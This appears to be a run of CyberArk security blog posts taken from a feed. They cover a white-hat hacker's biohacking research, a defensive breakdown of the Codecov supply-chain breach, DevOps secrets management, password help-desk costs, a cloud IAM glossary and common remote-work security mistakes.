We sat down with Noe to hear his story and find out what he’s been up to while grounded at home during the pandemic. Plus, we had to see for ourselves how this self-proclaimed “cyborg” is transforming his own body – chip by chip – in the name of research and cybersecurity advancement. But more on that later.

Frogger and Solving the Unsolvable Puzzle

Noe’s interest in technology can be traced back to his father, a gadget lover and early tech adopter who introduced him to the Commodore 64 in the early 1980s.

Noe remembers the precise moment his own technology fascination turned into a full-blown obsession. He was reading a coding newsletter that outlined steps for building a simple computer game – Frogger, to be exact.

“I made a coding error while following the instructions,” he recalls, “but the mistake actually made it so that my frog wouldn’t die,” he says. “That was when it clicked for me, and I started to think more critically about why this happened and how I could manipulate the outcome.”

With the frog (somewhat) proverbially out of the well, Noe started to realize the capabilities of technology went far beyond the pages of instruction manuals and computer magazines. And he’s been pushing the boundaries ever since.

He’s spent decades honing his skills – mostly by practical application. And his career as a grey-turned-white hat hacker has had numerous twists and turns along the way. But one thing has never changed: the thrill of cracking the code and solving the “unsolvable” puzzle.

It’s what Noe says he loves most about his job – finding new, creative ways to exploit technology systems and pinpoint even the tiniest of flaws so that organizations can strengthen protections and help prevent attacks. And he’s making a name for himself as a global technology evangelist in the process.  He’s presented threat research in more than 20 countries and keynoted major security conferences around the world.

Attack and Defend

Pre-COVID, you’d often find Noe side-by-side with customers, sleeves rolled up – tattoos revealed – surrounded by computers. His high-energy presentations dig into the why and how of some of the world’s most sophisticated attacks. In fact, this hands-on approach has prompted some rather uncomfortable conversations with airport security staff about the bag of suspicious-looking tech tools that accompany him to each engagement.

One evening, after a presentation in Brazil, Noe came up with a new, interactive way for organizations to expand their skills as defenders. After returning home and fleshing out the idea alongside friend and colleague Andy Thompson, the CyberArk Attack & Defend series was born. In these capture-the-flag style workshops, attendees use real-world attack tools, techniques, and procedures (TTPs) to execute the high-profile attacks seen in today’s headlines. Then, they swap roles and interact with CyberArk solutions to learn how to detect and defend against the same attacks.

Noe explains that most security professionals spend a lot of time reading about attacks, but few have actually seen one being perpetrated in real-time.

“In this virtual war room, people get a very realistic perspective of what they’re up against,” he says. “We see the moment of clarity when they sit down and with four lines of code, they’ve performed a devastating Golden Ticket attack, for example. The look in their eyes says, ‘I get it, I understand this is not witchcraft.’”

What started out as a workshop has grown into a global multi-track series offering a range of attack simulations and defensive countermeasures – in the cloud, on the endpoint, across the DevOps pipeline, and more.

Biohackers: The Invisible Threat

This training is helping security professionals stay a step ahead of attackers. But what happens when they come up against someone who is both the attacker and the attack vector?

What if a rogue employee on a mission to take down the company goes as far as biohacking their own body, implanting an RFID microchip that unlocks physical doors to company buildings and secretly stores and pilfers out sensitive data and files? Or, potentially worse, someone who conceals an entire Linux system beneath their skin, passes every physical and digital security check, and makes off with your most valuable corporate assets?

It may sound like futuristic science fiction, but it’s reality today, Noe warns, and something security teams must absolutely pay attention to. And he, of all people, would know. You see, it’s never been enough for him to just study cutting-edge cyber defense; he believes he must live it. Over the past several years, Noe has undergone a series of bio-implant procedures to “become more than human” and along the way, delve deeper into the mind of an attacker.

His personal biohacking journey and long cyber career make Noe uniquely qualified to explore the collision between human augmentation and cyber warfare. And on May, 19 he’ll take to the virtual RSA Conference stage to do just that. His highly anticipated talk “Biohackers: The Invisible Threat” will outline the past, present and future state of biohacking and bioimplants; demonstrate how compromising contactless technologies can threaten physical and digital security; and help security professionals prepare for this new frontier.

As our own talk with Noe wound down, we asked him how someone so deeply entrenched in the attacker’s psyche stays on the straight and narrow. Noe says he’s happy to call himself a white hat, fulfilled by helping others defend against evolving threats, and doing work that he and his family can be proud of. And since he said it himself, we’ll close with this shameless plug: “The fact that I’m working for a security company that I actually believe in makes it really easy to be on the good side.”

 

Editor’s Note: Learn more about Noe’s RSA Conference presentation by reading this Archer News article, Biohacker shows how hand implant attacks can work, and watching this video interview. 

]]>
Breaking Down the Codecov Attack: Finding a Malicious Needle in a Code Haystack https://www.cyberark.com/blog/breaking-down-the-codecov-attack-finding-a-malicious-needle-in-a-code-haystack/ Wed, 28 Apr 2021 11:30:24 +0000 https://www.cyberark.com/?p=117293 Codecov Breach Deconstruction

Earlier this month, San Francisco-based technology company Codecov discovered that attackers had compromised its software platform — used by more than 29,000 customers worldwide to test software code — in the latest digital supply chain attack to make headlines. While that was troubling enough, there was an added hitch.  Although the attack was identified and reported in April, the tampering reportedly started back in January. And it may have continued undetected had it not been for some astute observations by a customer.

The ripple effects and long-term ramifications of this attack have not yet been determined, and investigation is still ongoing. However, based on reports, we can examine the Tactics, Techniques and Procedures (TTPs) used by attackers to place a needle in a haystack of code, surreptitiously infect Codecov’s CI/CD pipeline and potentially gain access to thousands of customer networks. What’s clear is that this attack, like so many before it, followed a familiar path: target and steal credentials to get to the intended target.

The Codecov Breach

Codecov produces an array of code testing software, and the software that was reportedly impacted during this attack was made specifically for CI/CD pipelines. When developers at a customer organization finish testing, they will often download a script directly from Codecov’s servers, which will check the code coverage of the testing apparatus. It will then report back to Codecov’s servers.

An online statement by Codecov details the initial breach discovery: “On Thursday, April 1, 2021, we learned that someone had gained unauthorized access to our Bash Uploader script and modified it without our permission. The actor gained access because of an error in Codecov’s Docker image creation process that allowed the actor to extract the credential required to modify our Bash Uploader script.”

This uploader tool works with popular development platforms like GitHub. They use secrets and other credentials that enable interaction between applications and other tools in the CI/CD pipeline, along with access to cloud resources.

After gaining a foothold and obtaining the necessary credentials, the attackers created a backdoor by hiding a single line of malicious code within the approximately 1,900 lines of code that made up the uploader. They did so with relative ease, as two-factor authentication was not required to access the uploader, according to reports.

Each time a developer downloaded the Codecov testing script, the malicious software would begin running on the customer organization’s test machines. This allowed the attackers to export the secrets, credentials and other sensitive data stored in the victim’s continuous integration environments and send them to an attacker-controlled server outside of the customer’s infrastructure.

The particulars of this attack share commonalities with the large-scale SolarWinds breach and present an interesting perspective on the CI/CD pipeline and how efforts to protect these dynamic environments often fall short. The Codecov supply chain attack was clearly designed to extrapolate weaknesses and scale efforts for maximum impact. It took advantage of the fact that Codecov’s script was an unusually large one, based heavily on environment variables — sets of dynamic name-value pairs used by Linux and Windows operating systems — that often contain hard-coded API keys, database credentials and more. These secrets are stored and used heavily within CI/CD pipelines. And because there is often very limited security oversight around how they are managed and protected, these secrets are easy targets for attackers who pinpoint and harvest them.

For months, the attackers apparently had code execution access into each and every system that was using the Codecov script. They avoided arousing suspicion by hiding the malicious code inside a larger code series — and by concentrating their efforts on those environment variables. Based on the line of script the attackers used — one that specifically centers on sending Git repository URLs to the attacker-controlled server — it appears that GitHub was the focus.

The Discovery

It’s not abnormal for an organization to consider code downloaded from a business partner to be trustworthy, and so customers don’t always pay much attention to the granular details of the code, such as its digital fingerprint. The fact that Codecov attaches a signature to its proprietary code, however, is ultimately what led to the discovery of the attack, months after the initial breach. When the signature on one machine didn’t match up to that on another, a red flag was sent up by a customer and the attack revealed. Had the attackers changed the code signature, they might well have been able to operate unnoticed for an indefinite amount of time.

The Takeaway

Development environments are complex, with numerous places where secrets and credentials can be, and often are inadvertently exposed. For example, while code repositories such as GitHub are an essential part of the development process, credentials can be inadvertently exposed by making code public and allowing attackers to include malicious code within the builds. An organization’s code and intellectual property can be tampered with or stolen from repositories if credentials are compromised.

While there is no one vendor or tool that can completely prevent digital supply chain attacks like this from happening, there are steps organizations can take to strengthen their security postures and minimize risk:

Perform Code Signature Checks. By simply checking the software’s digital fingerprint to verify its integrity, the “dwell time” of this attack could have been limited to mere days or even hours, rather than months.

Mandate Multi-Factor Authentication (MFA). By looking at this attack process from the attackers’ point of view, the Codecov breach was made a lot simpler because they didn’t need a second authentication factor or another piece of approval to insert their code.

Do Not Store Credentials and Secrets in Environment Variables. The reasons are numerous: most notably, it is extremely hard to track usage of environment variables, as they are passed down to child processes that allow for unintended access and break the principle of least privilege. Instead, if an application requires a secret be handed over in an environment variable, use a secrets manager to help ensure only authenticated users get access to the clear text secrets.

Implement Threat Detection Capabilities. CI/CD pipelines are highly automated, which means there is little human interaction, making it easier for attackers to fly under the radar. Having threat detection capabilities in place could help detect anomalies and potential breaches easier and earlier.

Finally, with cybersecurity, most things boil down to effective and consistent communication. Developers simply don’t always have the awareness of inherent security issues along CI/CD pipelines, nor do they often have a clear sense of what their tools are actually doing with credentials and secrets. Making the dangers of vagueness and ambiguity clear to developers is a core part of Shift Left, and it’s an important — if not always welcome — way forward to more stringent security.

Developers may sometimes look at security specialists as just one more layer that makes their jobs harder. But there’s obviously a compelling need for this important layer. And while putting in the time and effort to clearly identify the risks involved and the measures needed to mitigate them may mean extra steps now, it could very well result in fewer security headaches later.

 

]]>
Codecov Breach Learning: Engage Developers to Protect the DevOps Pipeline https://www.cyberark.com/blog/codecov-breach-learning-engage-developers-to-protect-the-devops-pipeline/ Thu, 22 Apr 2021 11:56:02 +0000 https://www.cyberark.com/?p=117149 Codecov Breach Secure DevOps Pipeline

Regardless of what industry you’re in, software is a driving force behind digital innovation. But what happens when the software your organization builds and uses to innovate isn’t secure? It’s a question that many organizations and government agencies are grappling with as they examine their development environments and digital supply chains post-SolarWinds — and with even more urgency since the recent Codecov breach.

This month, Reuters reported that attackers infiltrated code coverage reporting solution provider Codecov and by manipulating one of its software development tools gained access to hundreds of organizations’ networks. This breach, with the potential for far-reaching and yet-unknown impact, reinforces the fact that development environments, including continuous integration/continuous delivery (CI/CD) pipelines, are vulnerable to targeted attacks. To minimize risk, it is imperative that security teams “shift left” and become fully embedded into the software development process — from the very first planning discussion to coding and all the way through production.

Who’s Keeping Your Secrets Safe?

ZDNet reports that DevOps adoption has almost doubled in the last five years and since COVID-19.

As DevOps adoption accelerates, developers and IT teams are relying heavily on automation and cloud services to code faster and accelerate software releases. While critical, these advancements increase the attack surface by introducing new credentials and secrets that are exceptionally powerful and highly susceptible to compromise, including those used:

  • On developer workstations and laptops to write code, build, test, provision, run and operate applications
  • By applications, scripts, and other non-human identities to communicate with other applications and tools, as well as to securely access databases and other sensitive resources
  • By human users to access DevOps tool administrative consoles, as well as cloud consoles

Unfortunately, too often organizations don’t fully recognize the extent to which these secrets are being used in their DevOps environments or how effectively these secrets are being secured across code repositories and the entire software development lifecycle (SDLC). Why is that?

The Great DevOps Security Divide

In some organizations, this is because “ownership” of secrets management — from requirements to platform selection and operations — isn’t clearly defined. Instead, secrets management decisions are happening at multiple levels: 46% companywide, 30% at the business/division level, and 24% at the project team level, according to a CyberArk survey. This lack of clarity and project-level vs. holistic approach to security leaves gaps that lead to problems as DevOps adoption increases and applications move to production.

Additionally, developers are inadvertently — or deliberately — taking on more direct security responsibilities, either because security is not aware or not yet involved with the project. In this case, developers are often making the secrets management decisions early in the development process without fully understanding the risks and requirements — and without involving the security team until it’s too late, often when code is already in production.

Fundamentally, development and security teams have very different priorities. Security is charged with reducing risk and defending the organization from attacks, while development is focused on delivering software innovations on tight release schedules. Without security’s involvement, development teams tend to make decisions that prioritize speed over security. This could mean taking risky shortcuts such as relying on the DevOps tool’s native security capabilities, using code repositories without securing credentials, or worse — hard-coding privileged credentials directly into code — or simply ignoring security altogether.

If not secured, the credentials and secrets used across the DevOps pipeline become easy — and valuable — targets for attackers. CI/CD pipeline and other DevOps tools are Tier Zero assets; access them and you get more credentials. With compromised credentials, attackers can take confidential data, inject malware into the codebase, or steal code and valuable IP from repositories.

What’s more, when secrets management isn’t addressed throughout the process, security has to jump in to confront issues at the eleventh hour — sometime right before code is scheduled to go into production — putting deployments on hold until security issues are resolved. Developers feel the pain with last-minute code changes, which is costly and frustrating for everyone involved.

Shift Left to Embed Security from the Start

To reduce risk and accelerate innovation, organizations embed security into development and operations practices from inception to deployment. This concept, commonly known as “shifting left,” requires security teams to engage with developers from the very beginning of the development process, breaking down silos and working together to make critical security decisions. This means developers can avoid rework and delays later in the lifecycle. And by making it easy for developers to secure their application credentials and secrets, security teams can reduce objections, increase adoption and accelerate development cycles.

While many organizations recognize the value of embedded security, moving from idea to action can be challenging. Today, only 41% of security and DevOps teams report that security is integrated throughout the application development process, according to our research. There are numerous reasons for this — especially when it comes to secrets management. For example, our research found 60% of developers believe security teams lack the necessary technical expertise.

How Can Security Shift Left and Better Engage Developers?

Now more than ever, it is critical that security and development teams come into alignment to protect their DevOps environment and digital supply chain. Yet while security teams know they need to engage with developers, changing mindsets and cultural practices take time, and getting started can be half the battle.

Our new guide, “Six Practical Approaches to Engage Developers and Improve DevOps Security,” provides enterprise security teams with pragmatic approaches for creating a security-first culture, strengthening bonds, and engaging with developers, including:

  • Introducing self-service models that make securing application credentials easy for developers
  • Running cross-educational workshops on specific use cases and digging into developer concerns and how to address them
  • Encouraging developers to think like attackers by providing training on common attack vectors and hands-on demonstrations
  • Embracing Agile and DevOps methods within security processes
  • Demonstrating “quick wins” to make an immediate impact, quickly show value, and establish credibility

For broader guidance on securing development environments and the software supply chain, read “Securing Privileged Access in Development Environments – Three Critical Use Cases.”

]]>
Between a Rock and a Hard Place: The IT Help Desk Manager’s Password Dilemma https://www.cyberark.com/blog/between-a-rock-and-a-hard-place-the-it-help-desk-managers-password-dilemma/ Tue, 20 Apr 2021 13:00:14 +0000 https://www.cyberark.com/?p=117110 IT Help Desk Password Support

Long-time Saturday Night Live fans will likely remember Nick Burns – a.k.a. “your company’s computer guy” – a popular recurring character played by Jimmy Fallon in the early 2000s.

Sporting a pocket protector and blaring pager, Nick makes his way around a large corporate office, fielding IT support questions and sarcastically mocking his technically “inept” customers – internal company employees – who could never get the printer to work and didn’t understand JavaScript jokes. No skit was complete without his signature phrases of “MOOOOVE” as he swoops into their workstations to fix a problem, and “Was that so hard?!” after he solves it within seconds.

While Nick’s character is a far cry from the business-critical role of today’s IT help desk manager, many in this position today can relate to the daily barrage of support tickets he faced. And even those with the sunniest of dispositions sometimes share his frustration in dealing with the same issues again and again. Most of the time, those issues can be traced back to passwords.

“Alright, one at a time. My brain doesn’t have a zip drive!”

While Nick’s days of Outlook 6.0 and LC-475 Macs with 32-bit processors are long gone, passwords are still alive 20 years later, and relied upon by organizations to authenticate corporate users.

As the pace of digital innovation accelerates, many organizations are adopting new technologies at a dizzying pace. Every new corporate application or tool becomes a new identity silo, with unique password management requirements, such as complexity and rotation cadence.

Requiring corporate users to repeatedly authenticate themselves to these new systems – and maintain (let alone remember!) numerous complex passwords – creates headaches galore for help desk professionals. Not only charged with provisioning users, they also manage hundreds (if not thousands) of corporate accounts – and the constant password reset requests and account lockouts that come with them.

Let’s use some industry estimates and simple calculations to quantify this massive password problem:

  • The “all-in” cost of an average help desk call to reset a password is between $40 and $50: we’ll use the mean of $45.
  • It’s estimated that each corporate user contacted the help desk with six to ten password-related issues per year before COVID-19 sent many workers home. So, eight issues spanning a typical year of 261 eight-hour working days, or 2,088 hours. In other words, one password issue is flagged to the help desk for every 261 hours of work.
  • Now consider that the typical work day for U.S. knowledge workers has lengthened from eight to 11 hours since the widespread shift to remote work. That means 261 11-hour working days, 2,871 hours total – or 783 hours more than “usual.” It also translates to three additional password-related help desk issues per person.
  • Based on this data, CyberArk estimates that for a large enterprise of 1,000 employees, $495,000 is spent annually resolving password issues. (11 password-related help desk requests per person x $45 per request x 1,000 users.) 

Instead of focusing on strategic business initiatives, already time- and resource-constrained IT help desk managers are pulling even longer shifts to address password issues, meet service level agreements (SLAs) and deal with frustrated end users.

“Don’t tell me your password is your dog’s name… Mooooooove!”

It’s old news that humans are terrible at selecting strong passwords. The ones they choose are often overly simple, common, reused or shared. In fact, employees reuse passwords across an average of 16 corporate accounts. While it’s tempting to look to password managers to solve this challenge, this approach is not without risk. Plus, password managers can’t manage who gets access to what sensitive resources, and for how long.

Attackers know that many organizations still rely on just one verification method – like a single set of credentials – to protect access to various systems and tools. This is especially dangerous when used in combination with single sign-on which allows broad access to many systems and applications.

They know that all they have to do is steal or compromise credentials for one corporate identity (any one will do) to gain a foothold and then escalate privileges toward high-value resources. Today, 67% of all breaches are caused by credential theft (using stolen or weak passwords) and social attacks.

Yet when IT teams implement stronger authentication methods in the name of security, workers often develop clever ways to circumvent these controls – or avoid using company approved systems and applications altogether to stay productive.

Eighty-four percent of IT service management professionals believe working in IT will continue to get harder over the next three years. And it makes sense why – as they find themselves stuck between a rock (keeping all systems and data as secure as possible) and a hard place (keeping teams productive).

Instead of resetting that password… again… consider retiring it altogether

By embracing a Zero Trust security model that integrates solutions such as passwordless authentication methods, forward-looking IT security and help desk teams to strike the right balance and take back some control.

By layering cloud-based single sign-on (SSO) with adaptive multi-factor authentication (MFA), these teams can overcome pervasive password challenges and make sure users are who they say they are – while giving them fast, responsive and streamlined access to everything they need.

This is where a bit of intelligence and context in the form of risk-based access comes in. Using machine learning and contextual signals, including user data, device data and activity data, organizations can automatically analyze access requests against historical patterns, assign risk to each login attempt and create access policies triggered by anomalous behavior.

What’s more, by giving workers self-service opportunities, IT help desk teams can lighten their own workloads, automate time-consuming tasks and refocus their efforts on high-impact work that keeps the business operational and profitable.

As Nick Burns would say in his classic parting shot, “Oh, by the way… you’re welcome!”

]]>
Cloud Identity and Access Management Alphabet Soup: A Definitive Guide https://www.cyberark.com/blog/cloud-identity-and-access-management-alphabet-soup-a-definitive-guide/ Thu, 15 Apr 2021 13:00:06 +0000 https://www.cyberark.com/?p=116939 Identity and Access Management (IAM) Guide

Successful digital transformation depends on the security of your cloud environment. Modern organizations recognize the importance of securing identities in the zero-perimeter, Zero Trust world of remote work and cloud-hosted data. But this is, of course, easier said than done, as the number, types, and interrelationships of identities massively expand across cloud environments.

It’s largely understood that cloud security is a shared responsibility between cloud provider and customer. But when exploring appropriate Identity and Access Management (IAM) controls for these environments, many organizations grapple with questions like: When are cloud-native tools sufficient, and when should we consider specialized solutions from other vendors?

It can be tricky to tell with all of the IT security jargon floating around (we security folks do love our acronyms). If you’ve ever found yourself stuck in this IAM alphabet soup, unable to differentiate between solution categories or pinpoint the optimal mix of controls for your organization’s cloud workloads, this definitive guide to cloud IAM acronyms is a good place to start.

Identity and Access Management (IAM): Identity and Access Management is a framework of controls and policies used to create, manage and secure identities – both human and non-human – and their permissions to access systems and resources.

IAM services offered by cloud providers, such as authentication, authorization, and encryption, are foundational security components in cloud environments. They allow customer organizations to centrally manage and granularly control access across their cloud estates.

Each cloud service provider provides its own IAM paradigms with distinct definitions of entitlements to access resources. Whether a provider uses the term “entitlements,” “permissions” or “privileges” to define access rights – IAM platforms help cloud security teams manage who can access what. On each platform, organizations build IAM policies that grant access entitlements to their identities.

While terminology varies regarding user types, platforms generally define identities as users, groups, and roles. A user is a single individual account. A group is a structure to manage several users that have similar responsibilities and require similar permissions. A role is a distinct identity that has permissions to perform a specific function. Often, roles are assumed by individual users to complete a given task.

It’s important to note that in the cloud, traditional designations of privileged access do not necessarily apply; generally speaking, any human or machine identity can be assigned permissions to access sensitive data and resources.

Role-based Access Control (RBAC): RBAC is a popular model for authorizing users that assigns permissions based on job function, in adherence to the rule of least privilege. RBAC is a tried-and-true authorization model that is widely adopted both on-premises and in cloud environments, most notably in Azure, where RBAC is a primary structure for organizations to manage entitlements to access Azure resources and services.

Attribute-based Access Control (ABAC): ABAC is a variation of the RBAC paradigm for user authorization popular on AWS. In an ABAC model, organizations can architect their permissions to access cloud resources in anticipation of future needs. Organizations classify their resources and assign common types of workloads with common tags. Certain identities can then be granted permissions to access all resources with this tag. This approach eliminates the need to manually provision access to new resources, but it also can make it difficult to enforce least privilege access if organizations take a broad, one-tag-fits-all approach to labeling their resources.

Access Control Lists (ACLs): ACLs are a control that allows organizations to create lists of users that can access specific cloud resources, most commonly virtual machine (VM) infrastructure. This permissions construct provides fine-grained control from a resource-centric view.

Single Sign-On (SSO): SSO solutions provide a centralized portal where users can access cloud workspaces and applications without remembering and entering passwords. Today, employees often have more credentials than they know what to do with. SSO controls provide quick, reliable access and eliminate the security risks of insecure or re-used passwords set by employees. They also eliminate the time and labor costs of IT teams resetting passwords.

Multi-Factor Authentication (MFA): MFA solutions verify the identity of users accessing cloud platforms or applications with additional factors such as a phone call, email or mobile push notification. Just as in on-premises apps, using MFA provides an additional layer of security for access to applications and sensitive resources and is widely considered a security best practice. Adaptive MFA, in which the method of authentication corresponds to the sensitivity of a given resource, is also growing in popularity.

Key Management Service (KMS): KMS offerings from cloud providers allow customers to create and manage the cryptographic keys that encrypt data and control their use across cloud services and workloads.

Cloud Access Security Brokers (CASBs): CASBs sit between users and cloud services to enforce enterprise security policies on cloud-based services. In effect, CASBs are “checkpoints” or “gateways” that govern and secure access to cloud services. CASBs are primarily used to protect SaaS application deployments and are particularly well-suited to detection of sensitive data in transit.

Cloud Workload Protection Platforms (CWPP): CWPPs help organizations protect the application workloads that run in their IaaS environments. As cloud-native DevOps becomes increasingly popular, key CWPP functions like system hardening, container protection, and vulnerability management become increasingly important for securing cloud-native applications.

Cloud-Native Application Protection Platforms (CNAPP): CNAPPs is an emerging category of solutions that analyzes application and data context to protect cloud-native applications and their hosts, whether virtual machines (VMs), containers, or serverless functions.

Cloud Security Posture Management (CSPM): CSPMs address risks of compliance violations and misconfigurations in enterprise cloud environments. CSPMs focus on the resource level to identify deviations from best practice security settings for cloud governance and compliance.

Cloud Infrastructure Entitlement Management (CIEM): CIEM solutions provide granular detection and management of risky IAM permissions. Organizations that rely on cloud-native IAM tools can quickly lose visibility and control of unused and misconfigured permissions to access resources like infrastructure, applications, and serverless functions. This is even more difficult in multi-cloud deployments with siloed toolsets and entitlements definitions. CIEM solutions provide cloud-agnostic, granular detection, and remediation of permissions that violate least privilege and allow organizations to defend against internal and external threats.

Don’t get lost in cloud IAM alphabet soup. Bookmark this page and refer back often.

And if you’re looking for ways to clean up permissions sprawl and protect identities across your cloud estate, give our CIEM solution – CyberArk Cloud Entitlements Managera free test drive. With no infrastructure needed, you’ll be up and running in about an hour so you can start rapidly reducing risk on day one.

]]>
It’s Identity Management Day: 16 Stats from the New Cybersecurity Battleground https://www.cyberark.com/blog/its-identity-management-day-16-stats-from-the-new-cybersecurity-battleground/ Tue, 13 Apr 2021 12:00:56 +0000 https://www.cyberark.com/?p=116620 Identity Management Day

Today is Identity Management Day – a U.S. awareness initiative presented by the National Cybersecurity Alliance and the Identity Defined Security Alliance (IDSA). In the midst of a dramatic technological and economic shift, this push to educate business leaders, IT decision makers and the general public about the importance of managing and securing identities comes at the perfect time.

All Roads Lead to Identity

Nearly every organization is on the transformation path to becoming more mobile, more digital, and more cloud-centric – all while supporting distributed workforces. They also face the challenge of an ever-expanding attack surface as the number, types, and interconnectedness of identities multiply across business applications and cloud workloads.

Every identity – whether customer, remote worker, third-party vendor, device, or application – requires an entry point into the modern enterprise. And the credentials linked to any identity can become privileged under certain conditions, unlocking higher levels of access and creating an attack path to an organization’s most valuable systems and assets.

Attackers understand the opportunity: the easiest way to establish a foothold in any environment is to steal credentials through phishing, social engineering, or malware. It’s why a vast majority of breaches involve lost, stolen, or compromised credentials.

Yet traditional approaches to security are increasingly ineffective as the unstoppable march toward digital transformation dissolves the barriers put up to separate the “trusted” from the “untrusted.”

Here are 16 reasons why identity has become the new cybersecurity battleground, and in turn, the only practical control plane.

Identity Management and Security Stats

Identity Security: A Privilege-led Approach

Securing identities – within business applications, from hybrid to multi-cloud workloads and throughout the DevOps pipeline – requires a new approach rooted in privileged access.

Identity Security follows a Zero Trust model to authenticate every identity accurately, authorize each identity with the proper permissions and provide access for that identity to privileged assets in a structured manner – all in a way that can be audited or accounted for. Identity Security also enables organizations to secure access across any device, anywhere, at just the right time – so they don’t have to choose between security and productivity.

Learn more about Identity Security and brush up on identity and access management best practices with these #IDMgmtDay resources:

 

]]>
6 Simple Remote Work Security Mistakes and How to Avoid Them https://www.cyberark.com/blog/6-simple-remote-work-security-mistakes-and-how-to-avoid-them/ Fri, 09 Apr 2021 13:00:24 +0000 https://www.cyberark.com/?p=116594 Remote Work Cybersecurity Mistakes

Since the COVID-19 outbreak, there have been countless headlines and viral social media posts exposing some of the worst remote security faux pas, ranging from the financially devastating to the easily avoidable to the outright strange. More than a year later, some people are still struggling to master their mute button — let alone take precautions to protect their digital identities or safeguard work-related information — and attackers have ways of getting even the most security-conscious employees to slip up.

At the height of the pandemic, 42% of the American labor force worked from home, according to a study conducted by Stanford Research, and one in four will continue to do so through 2021, according to a December 2020 Upwork study. While many will return to the office once it is safe to do so, the UpWork study found that nearly 23% of workers are expected to be remote in five years — or nearly double the pre-pandemic percentage.

The days of everyone working onsite from company-issued PCs seem like ancient history. This January, Fortune reported that sales of laptop and desktop computers exceeded 302 million units in 2020 — the highest they’ve been in six years. Many of those devices are now connected to company networks. They’re also being used by remote learners, virtual gamers, and online shoppers; and attackers are taking advantage.

In fact, a recent study commissioned by Microsoft Ireland found that 26% of remote workers had personally experienced a cyber attack. The study also found that 36% of employers were forced to pivot to a remote work setting quickly as a result of the pandemic and are still working to implement the security, privacy, and workplace procedures that are necessary to secure this new environment.

“We don’t have the same corporate hygiene at home, and we’re actually expanding the footprint of our corporate network from an attack perspective because there aren’t as many security controls around it,” explains Bryan Murphy, director of consulting services at CyberArk and leader of our remediation services team.

Training and educating employees about cybersecurity risks is one of security leaders’ top operational challenges today, and as record numbers of people continue to work outside office walls, the need for vigilance and attention to security has never been greater. Here are a few of the most important remote work faux pas to avoid:

1. Using Weak Passwords

Cybersecurity and IT professionals have long stressed the importance of using unique, secure, complex, and random passwords, especially when it comes to sensitive materials. Unfortunately, studies suggest that those warnings aren’t always taken seriously. Users tend to use simple, easy-to-remember passwords at the expense of their own security. In fact, according to a CyberArk study, 82% of remote workers admit to reusing passwords.

“If you use the internet, consider using a personal password manager so that every site has a unique password – that’s first and foremost,” says Murphy, who himself has more than 600 unique and complicated passwords stored in his password manager.

Murphy explains that it’s also important to use biometric and two-factor authentication on all websites and applications for an added layer of protection.

Of course, if you’re responsible for managing access on the scale of a business, password managers are not enough to protect you. That’s where privileged access management can help.

2. Taking Risky Security Policy Workarounds

Cybersecurity practices can sometimes feel overburdensome, and over the course of a busy workday, remote workers may be tempted to find workarounds that increase productivity at the expense of security.

According to the same CyberArk study, 67% of respondents admit to seeking a workaround to corporate security policies, such as sending work documents to their personal email address, sharing passwords, or installing unverified applications on their work devices.

One major risk many take for the sake of convenience is storing passwords in their browser, but Murphy warns that allowing passwords to autofill is risky.

“The password manager in your browser is a common place where attackers look for credentials — whether personal or corporate, it doesn’t matter — they look there all the time,” he says. “There’s a configuration setting in Chrome or Safari, for example, the ‘don’t save passwords’ option, and generally in corporate environments they automatically turn that on so it never lets you do it, but at home people just do it for convenience.”

Remote workers may attempt to sidestep these controls for various reasons, including convenience and ease of use, without fully understanding the downstream consequences if credentials are exposed. While taking shortcuts may seem harmless, these security protocols are in place for a reason – and ignoring them can have real consequences.

3. Sharing Devices with Family

Being stuck at home has made it tempting for remote workers to let family members use their work computers for non-work-related activities.

“Because it’s so chaotic right now, the work device becomes the personal device — like, my children need to use Zoom so just sit at my desk and do it,” says Murphy. “It’s not that there’s a vulnerability or a flaw within Zoom, but using an unfamiliar device could open up the possibility that your child clicks a link or goes to an unknown website. So it all comes back to the separation of work and personal use, and we’re blurring that line too often.”

Letting a family member use your employer-issued devices can expose the entire corporate network to significant risk and general confusion. Case in point? One unlucky lawyer discovered the perils of lending work computers to others and accidentally showed up to virtual court session as a cat in a widely shared viral video.

Sharing a work device with others is never a good idea, and if you want to use your home internet connection for work-related tasks Murphy recommends taking a few simple precautions to keep work and personal data separate and secure. First, he suggests creating a guest WiFi network separate from the standard home network for work-related activities. “Generally, the guest network isolates all the devices, so they can’t communicate with one another,” he says. “That effectively puts a firewall around it so you can only communicate out, not in.”

Murphy also recommends creating a separate, password-protected user account with restricted access for web browsing and day-to-day related activities.

4. Ignoring Common Attack Signs and Symptoms

When an attack is being perpetrated or attempted there are a number of common signs and symptoms that can act as an early warning signal. Employers should strive to educate their remote workers on what to look out for and how to identify a potential breach.

“When you start to see the browser getting modified, and you didn’t do it, that’s a red flag for sure,” says Murphy. “Pop-ups are a big one, or your default browser is changed, or you have a bunch of things open in your browser you didn’t open yourself.”

Other signs and symptoms include loss of control of the keyboard or mouse, applications or files appearing that weren’t intentionally downloaded, and sudden unexplained system slowdowns. Don’t ignore these symptoms — if you feel there are unauthorized changes to your system, follow your company procedures. End user awareness is key — say something, even if it appears minor. After all, it could be an early warning sign of something much bigger.

5. Giving Vendors and Contractors Too Much Access

Most employers depend on vendors and contractors, and those external contributors often require a certain degree of access in order to provide their services.

It’s important for IT security teams to follow the principle of least privilege — limiting each users’ access to only what is needed, for only as long as it is needed. And this doesn’t just apply to third parties — Zero Trust approaches require every identity (human or machine) to be authenticated and authorized before access is granted.

“When you think about that remote workforce, it’s not enough to say we have to protect our people, it’s also the third-party vendors that might have different access and security controls and need to be managed, monitored and controlled just like regular employees,” says Murphy.

Organizations should require vendors and contractors to adhere to the same security practices and standards as the rest of their workforce, he notes.

6. Hitting “Remind Me Tomorrow” on Software Updates

Considering new software updates are designed to reduce security risks, one of the best ways to keep devices secure is to keep them up to date. These updates, which require nothing more than accepting when prompted, are so effective at keeping devices safe that Murphy says he’s seen attackers initiate updates themselves. He explains that they often do so in order to prevent others from attacking the same network once they’ve gained access.

“When they find the flaw they’ll secure the system so only they have access to the flaw,” he says. “They’ll go through your network devices — like your home router, where many people have default passwords — and if the firmware is out of date, they remote back in and patch it up to the proper level so nobody else can hack it.”

So, don’t be like Billy — keep your software, browsers and operating system up to date.

Small Steps to Mitigate Big Risks

While it’s impossible to remain entirely secure, there are a lot of small steps individual remote workers can take to reduce the risks in this new working environment. “There’s a million other things you can do — but with anything, if we give you too much or it’s too complicated, you’re probably not going to do anything at all,” Murphy says. “Focusing on least privilege, implementing multi-factor authentication and separating work and personal devices, at a minimum, is a really good start.”

]]>
